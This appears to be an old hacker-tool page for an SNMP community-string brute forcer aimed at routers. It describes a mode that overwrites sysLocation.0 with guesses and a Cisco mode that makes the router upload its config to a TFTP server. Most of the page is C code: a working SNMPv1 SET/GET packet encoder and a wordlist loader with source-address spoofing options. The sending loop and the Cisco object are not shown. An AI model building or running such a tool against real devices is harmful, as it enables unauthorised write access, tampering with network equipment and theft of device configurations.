This tool brute-forces the community name of a remote SNMP device. It is quite fast and can find the community name in a matter of minutes.
The code itself is kinda messy, so don't start sending back comments on that. But if you have anything to say about the idea, please do. Also, if you manage to h4k0r a router, drop me a mail, since I have done no testing in the wild, only on HP printers and a 3Com switch (and I got a friend to test it on a Cisco; it does work!).
Sends SNMP packets to a router in an attempt to find out the rw (read-write) community. It's basically a very fast SNMP brute forcer: since it doesn't need to wait for a response, it can guess communities as fast as you can send packets (or as fast as the router can receive them). This is thanks to SNMP using UDP :]
Mode 1 is for when you have read access. It sends an SNMP SET request, authenticated with the community it is guessing, that writes that same guess into system.sysLocation.0. If the SET succeeds, sysLocation now holds a write community; you then read sysLocation.0 back with the read community to see which guess got through :] (Note that this overwrites whatever sysLocation was set to on the device.)
Mode 2 is for when you don't have read access. It tells the router to upload its config file to a TFTP server (specified on the command line with -t).
** This mode only works on Ciscos! **
-D is the delay in milliseconds between packets. Don't set this too low, or the router will drop some of the packets. Although I think, if you're sending packets across the 'net, there's not much chance of this even if the delay is low. The default is 100.
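To make the mode 1 exchange concrete, here is an added example (not code from the original tool) that hand-encodes the two SNMPv1 packets it relies on: a SetRequest that writes the guessed community into sysLocation.0, authenticated with that same guess, and the GetRequest used afterwards to read sysLocation.0 back with the read community. The BER layout follows RFC 1157; the community strings and request IDs are constructed sample values, and sending the bytes over UDP/161 is left to the caller. Because the builder takes an arbitrary OID, the same function can build a mode 2 SET, but the Cisco object that triggers the TFTP upload is not given on this page and is deliberately not filled in here.

```c
/* snmpv1_build.c: hand-rolled BER encoder for the SNMPv1 packets mode 1 relies on.
 * Added example, not code from the original tool. Sending over UDP/161 is left out. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define SNMP_GETREQUEST 0xA0   /* context-specific, constructed, tag 0 */
#define SNMP_SETREQUEST 0xA3   /* context-specific, constructed, tag 3 */

/* sysLocation.0 = 1.3.6.1.2.1.1.6.0, the object mode 1 overwrites with each guess */
static const uint32_t SYSLOCATION_0[] = {1, 3, 6, 1, 2, 1, 1, 6, 0};
#define SYSLOCATION_0_LEN 9

/* BER length octets: short form below 128, long form (0x81/0x82) above. */
static size_t ber_len(uint8_t *out, size_t len)
{
    if (len < 128) { out[0] = (uint8_t)len; return 1; }
    if (len < 256) { out[0] = 0x81; out[1] = (uint8_t)len; return 2; }
    out[0] = 0x82; out[1] = (uint8_t)(len >> 8); out[2] = (uint8_t)len; return 3;
}

/* tag + length + copied body; returns the number of bytes written */
static size_t ber_tlv(uint8_t *out, uint8_t tag, const uint8_t *body, size_t blen)
{
    size_t n = 1;
    out[0] = tag;
    n += ber_len(out + n, blen);
    if (blen) memcpy(out + n, body, blen);
    return n + blen;
}

/* Non-negative INTEGER in minimal big-endian two's complement. */
static size_t ber_uint(uint8_t *out, uint32_t v)
{
    uint8_t le[5], be[5];
    size_t n = 0, i;
    do { le[n++] = (uint8_t)(v & 0xFF); v >>= 8; } while (v);
    if (le[n - 1] & 0x80) le[n++] = 0x00;      /* keep the sign bit clear */
    for (i = 0; i < n; i++) be[i] = le[n - 1 - i];
    return ber_tlv(out, 0x02, be, n);
}

/* OBJECT IDENTIFIER: first two arcs fold into 40*a+b, the rest are base-128 groups. */
static size_t ber_oid(uint8_t *out, const uint32_t *arcs, size_t n)
{
    uint8_t body[64], grp[5];
    size_t bl = 0, i;
    int k;
    body[bl++] = (uint8_t)(arcs[0] * 40 + arcs[1]);
    for (i = 2; i < n; i++) {
        uint32_t a = arcs[i];
        k = 0;
        do { grp[k++] = (uint8_t)(a & 0x7F); a >>= 7; } while (a);
        while (k-- > 1) body[bl++] = grp[k] | 0x80;  /* continuation bit on all but the last group */
        body[bl++] = grp[0];
    }
    return ber_tlv(out, 0x06, body, bl);
}

/* Build one SNMPv1 message carrying a single varbind. value == NULL encodes a NULL
 * (what a GetRequest sends); otherwise an OCTET STRING (what mode 1's SetRequest sends).
 * Returns the packet length, or 0 if the inputs do not fit. */
size_t snmpv1_build(uint8_t *out, size_t outsz, uint8_t pdu_type, const char *community,
                    uint32_t request_id, const uint32_t *oid, size_t oidlen, const char *value)
{
    uint8_t vb[256], vbl[256], pdu[384], msg[512], pkt[520];
    size_t n, p, m, clen = strlen(community), vlen = value ? strlen(value) : 0;

    if (clen > 100 || vlen > 100 || oidlen < 2 || oidlen > 12) return 0;

    /* VarBind ::= SEQUENCE { name OBJECT IDENTIFIER, value } */
    n  = ber_oid(vb, oid, oidlen);
    n += value ? ber_tlv(vb + n, 0x04, (const uint8_t *)value, vlen)
               : ber_tlv(vb + n, 0x05, NULL, 0);
    n  = ber_tlv(vbl, 0x30, vb, n);                 /* the single VarBind */

    /* PDU body: request-id, error-status 0, error-index 0, variable-bindings (VarBindList) */
    p  = ber_uint(pdu, request_id);
    p += ber_uint(pdu + p, 0);
    p += ber_uint(pdu + p, 0);
    p += ber_tlv(pdu + p, 0x30, vbl, n);

    /* Message ::= SEQUENCE { version INTEGER (0 = SNMPv1), community OCTET STRING, data PDU } */
    m  = ber_uint(msg, 0);
    m += ber_tlv(msg + m, 0x04, (const uint8_t *)community, clen);
    m += ber_tlv(msg + m, pdu_type, pdu, p);
    n  = ber_tlv(pkt, 0x30, msg, m);
    if (n > outsz) return 0;
    memcpy(out, pkt, n);
    return n;
}

int main(void)
{
    uint8_t set[512], get[512];
    size_t i, n;
    const char *read_comm = "public", *guess = "private";   /* constructed sample values */

    /* Mode 1, step 1: SET sysLocation.0 := guess, authenticating with the guess itself.
     * If the router accepts it, the guess is a write community. */
    n = snmpv1_build(set, sizeof set, SNMP_SETREQUEST, guess, 1, SYSLOCATION_0, SYSLOCATION_0_LEN, guess);
    printf("SetRequest (%zu bytes):", n);
    for (i = 0; i < n; i++) printf(" %02x", set[i]);
    printf("\n");

    /* Step 2: read sysLocation.0 back with the known read community; the GetResponse
     * value equal to one of the guesses tells you which SET got through. */
    n = snmpv1_build(get, sizeof get, SNMP_GETREQUEST, read_comm, 2, SYSLOCATION_0, SYSLOCATION_0_LEN, NULL);
    printf("GetRequest (%zu bytes):", n);
    for (i = 0; i < n; i++) printf(" %02x", get[i]);
    printf("\n");
    return 0;
}
```

The request-id is what lets you match a GetResponse to the request that caused it, which matters little for the fire-and-forget SETs but is what you compare against when you poll sysLocation.0 back. Lengths above 127 switch to the long form automatically, so a long wordlist entry or community still encodes correctly.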
This was compiled on a Slackware 3.6 system. On some other Linux systems the ip_udp.h file is in a different place (linux/udp.h?), so you'll have to change the include if you get errors about it.
/* Argument parsing and wordlist loading from the tool's main(). The includes, variable
 * declarations and the erexit()/usage() helpers are not part of this excerpt and are filled
 * in here so it compiles on its own; the byte-at-a-time read of the original is kept, with
 * the missing checks added (argv bounds, NULL before inet_addr(), open/malloc failures,
 * a last line without a trailing newline). The sending loop follows in the original. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

static void erexit(const char *msg) { fprintf(stderr, "%s", msg); exit(1); }
static void usage(void)
{
    fprintf(stderr, "usage: -s <source ip> -d <dest ip> -w <wordlist> [-m <1|2>] [-t <tftp ip>] [-D <delay ms>]\n");
}

int main(int argc, char **argv)
{
    char *saddr = NULL, *daddr = NULL, *tftpserver = NULL, *wordfile = NULL;
    char *words, a[1];
    int mode = 1, delay = 100, i, fd, ret, wordcount, wordfilesize;   /* mode default assumed, delay default 100 as documented */
    struct stat finfo;

    /* every option takes a value, so argv[i+1] must exist before it is read */
    for (i = 1; i < argc; i++)
    {
        if (argv[i][0] != '-' || i + 1 >= argc) { usage(); erexit("Bad or incomplete option\n"); }
        if (!strcmp(argv[i],"-s")) saddr = strdup(argv[++i]);
        else if (!strcmp(argv[i],"-d")) daddr = strdup(argv[++i]);
        else if (!strcmp(argv[i],"-t")) tftpserver = strdup(argv[++i]);
        else if (!strcmp(argv[i],"-w")) wordfile = strdup(argv[++i]);
        else if (!strcmp(argv[i],"-m")) mode = atoi(argv[++i]);
        else if (!strcmp(argv[i],"-D")) delay = atoi(argv[++i]);
        else { usage(); erexit("Unknown option\n"); }
    }

    /* the NULL checks have to come before inet_addr(): inet_addr(NULL) crashes */
    if (saddr == NULL) { usage(); erexit("No Source Address\n"); }
    if (daddr == NULL) { usage(); erexit("No Dest Address\n"); }
    if (wordfile == NULL) { usage(); erexit("No Wordfile\n"); }
    if (inet_addr(saddr) == INADDR_NONE || inet_addr(daddr) == INADDR_NONE)
        erexit("Invalid source/destination IP address\n");
    printf("Ok, spoofing packets from %s to %s with wordlist %s (Delay: %d)\n", saddr, daddr, wordfile, delay);
    if (mode > 1)
    {
        if (tftpserver == NULL) { usage(); erexit("Mode 2 needs a TFTP address (-t)\n"); }
        printf("TFTP Address:%s\n", tftpserver);
        if (inet_addr(tftpserver) == INADDR_NONE) erexit("Invalid TFTP address\n");
    }

    /* Load the wordlist into one buffer: one community per line, newlines turned into NULs */
    if (stat(wordfile, &finfo)) { printf("Stat failed!\n"); exit(-1); }
    fd = open(wordfile, O_RDONLY);
    if (fd < 0) erexit("Cannot open wordfile\n");
    wordfilesize = (int) finfo.st_size;
    printf("Size is %d\n", wordfilesize);
    words = (char *) malloc(wordfilesize + 1);   /* +1 keeps the last word NUL-terminated without a trailing newline */
    if (words == NULL) erexit("Out of memory\n");
    wordcount = 0;
    for (i = 0; i < wordfilesize; i++)
    {
        ret = read(fd, a, 1);
        if (ret == 1)
        {
            if (a[0] == '\n') { a[0] = 0x00; wordcount++; }
            words[i] = a[0];
        }
        else
        {
            printf("Read returned %d\n", ret);
            break;
        }
    }
    words[i] = 0x00;
    if (i > 0 && words[i - 1] != 0x00) wordcount++;   /* last line had no trailing newline */
    close(fd);
    printf("Loaded %d communities\n", wordcount);

    /* the guessing loop (one SNMP packet per word, delay ms apart) is not part of this excerpt */
    free(words);
    return 0;
}